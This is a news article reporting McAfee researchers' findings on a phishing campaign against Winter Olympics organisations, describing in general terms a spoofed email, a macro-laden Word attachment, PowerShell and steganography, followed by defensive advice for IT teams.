Security analysts at McAfee Advanced Threat Research have identified a phishing campaign aimed at the Winter Olympics. The event is to take place in Pyeongchang, South Korea between 9 and 25 February this year.
Details of the phishing campaign were published in a blog by Ryan Sherstobitoff and Jessica Saavedra-Morales.
The emails were sent to [email protected]. A number of other organisations involved in the Winter Olympics were then added to the BCC line. Of particular interest is that the attackers spoofed the sender details. It made the emails appear as if they had come from the South Korea National Counter-Terrorism, Center (NCTC). As the NCSC was conducting security drills over the same period, this gave the emails a degree of authenticity.
What do we know about the attack?
The emails contain an infected Microsoft Word document. According to the researchers its file name is: “농식품부, 평창 동계올림픽 대비 축산악취 방지대책 관련기관 회의 개최.doc”. This translates to “Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics”.
When users click on the document it ask them to Enable Content. This initiates a Visual Basic macro which launches a PowerShell script. The script, in turn, downloads an image file that looks innocuous. However, the attackers have used steganography to hide malicious code in the image. That code is then read by the PowerShell script and executed on the target computer.
To prevent detection the code is heavily disguised (obfuscated). This does not prevent it from executing the code. The attackers are also using an encrypted channel back to their server. The two researchers say this is: “likely giving the attacker the ability to execute commands on the victim’s machine and to install additional malware.”
The investigation has also located a compromised server in South Korea and a server in Costa Rica.
What does this mean?
This is not the first attack against the Winter Olympics and it won’t be the last. High profile events, especially sporting events are very attractive to hackers. This is about more than just hacking the event itself. Hackers will use the Winter Olympics in a lot of attacks over the next few months. Some will pretend to be news and some will offer access to exclusive content. All will seek to install malware and take over the end-user computer.
In this case the attackers have demonstrated a number of interesting vectors. They spoofed the email address of the NCTC and used a compromised server. They also created a fake domain using the South Korean Ministry of Agriculture and Forestry details. This would have increased the likelihood of people opening the malicious email attachment, especially as it seemed to come from the same ministry.
One of the more interesting parts of this attack is the use of steganography. This is a technique that has been around for a very long time. However, it has not been part of many disclosed cyber-attacks. This attack could herald a change in that.
IT security teams need to warn their users of attacks around email and websites set up around the Winter Olympics. They also need to consider new email rules around the Winter Olympics. If not, we will see a significant spike in attacks.